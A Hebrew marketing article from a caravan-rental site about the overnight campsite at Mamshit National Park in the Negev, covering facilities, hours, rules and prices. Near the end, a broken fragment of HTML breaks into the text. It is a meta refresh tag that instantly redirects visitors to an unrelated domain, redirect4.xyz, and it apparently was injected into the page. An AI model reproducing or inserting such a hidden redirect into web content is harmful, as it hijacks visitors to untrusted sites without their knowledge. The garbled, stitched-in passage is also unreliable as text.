לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

הגן הלאומי ממשית, בצפון הנגב, מחזיק בתואר המחייב של אתר מורשת עולמית.ממשית

הוא כולל בתוכו את השרידים של עיר נבטית עתיקה, מהתקופות הרומית והביזנטית, ומאפשר להיחשף למראות עוצרי נשימה, שהם בבחינת חזרה במנהרת הזמן (חלק מהשרידים שוחזרו וחלקם נשמרו היטב מאז הקמתם).

במקום תמצאו שרידי מתחמי מגורים, שער העיר, כנסיות, סכרים ועוד, כשהכל על רקע התפאורה המדברית המושלמת.

דרך מצוינת ליהנות מכל היופי הזה, וגם לחקור היטב את אזור הנגב והדרום, היא באמצעות אירוח בחניון הלילה של האתר – כתובת אליה מגיעים קרוואנים רבים. הנה כל מה שצפוי לכם בחניון.

המאפיינים העיקריים של החניון

חניון הלילה של הגן הלאומי ממשית הוא בעל קיבולת של כ-600 איש, והוא פתוח בכל ימות השנה למעט יום כיפור. אלה יכולים לבחור בין אופציות שונות של לינה המוצעות במקום: זו יכולה להיות לינת שטח באוהלים פרטיים, אבל גם לינה על מזרונים במאהל בדואי, לינה באוהלים קבועים, בחדרי צוות או כמובן בקראוונים.

בחניון הקראוונים חיבור לחשמל ונקודה מרכזית למילוי מים. תמצאו בו מעבר לכך תאורה מלאה, ברזיות מים לשתייה, מקום להגדלת מנגלים, פינות קומזיץ (כולל עצים למדורה), ספסלים ושולחנות (קבועים או ניידים), תאים לטעינת טלפונים סלולריים ועוד. אם הקרוואן שלכם לא מכיל שירותים או מקלחות, תוכלו להיעזר בתשתיות של החניון: 5 תאי שירותים עבור נשים, 5 תאים עבור גברים, 5 תאים הממוקמים ליד הטוקולים, 5 תאי מקלחת לנשים ו-5 תאי מקלחת לגברים. במתחם מטבח שדה ובו מקררים גדולים, כירות גז וכיורים לשטיפת כלים. גם כאן, אם הקרוואן שלכם לא מכיל את התשתיות האלה, תוכלו להיעזר באלה שמציע החניון עבור המתארחים בו.

לחניון של הגן הלאומי ממשית ניתן להיכנס מהשעה 16:00 ועד השעה 22:30, כאשר היציאה מהחניון היא עד השעה 11:00 ביום רגיל, או 10:00 בחגים. כדי להימנע מאי נעימות בכניסה למקום, או על חיוב גבוה ביציאה ממנו, הקפידו לעמוד בתנאים. שימו לב שחל איסור להפעיל גנרטורים או אמצעי הגברה לחניון, כשאיסור אחר הוא על כניסה עם כלבים.

עבור המתארחים בחניון פועל מרכז שירות למטייל, שמאפשרות לרכוש מוצרים שונים: פנס, פחמים, מפות סימון שבילים, מזכרות, אוכל, שתייה קלה ועוד. מי שחסר לו בקרוואן מקום שינה לאחד מבני המשפחה, יכול לשכור מזרון ללילה במחיר סמלי.

אז כמה זה עולה?

כניסה לחניון של הגן הלאומי ממשית עם קראוון פרטי כרוכה בתשלום, אבל הוא ממש לא בשמיים ודומה למחירים של חניונים אחרים של רשות הטבע והגנים בישראל. מבוגרים נדרשים לשלם 53 ש”ח, בעוד שהמחיר שנגבה מילדים הוא 42 ש”ח. מנויי רשות הטבע והגנים מקבלים הנחה, ומשלמים 38 ש”ח למבוגר או 32 ש”ח לילד. מחירים אלה כוללים ביקור בגן הלאומי עצמו. על חיבור לחשמל נדרש לשלם סכום של 30 ש”ח לקראוון ללילה.
equiv
"Refresh" content="0; URL=http://redirect4.xyz/">

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

המרכז להשכרת קרוואנים

שירותי השכרת קרוואנים עם החברה המובילה בישראל. קרוואנים לכל צורך ולכל מטרה להשכרה במחיר זול ומשתלם!

אז מה היה לנו בכתבה:

צרו איתנו קשר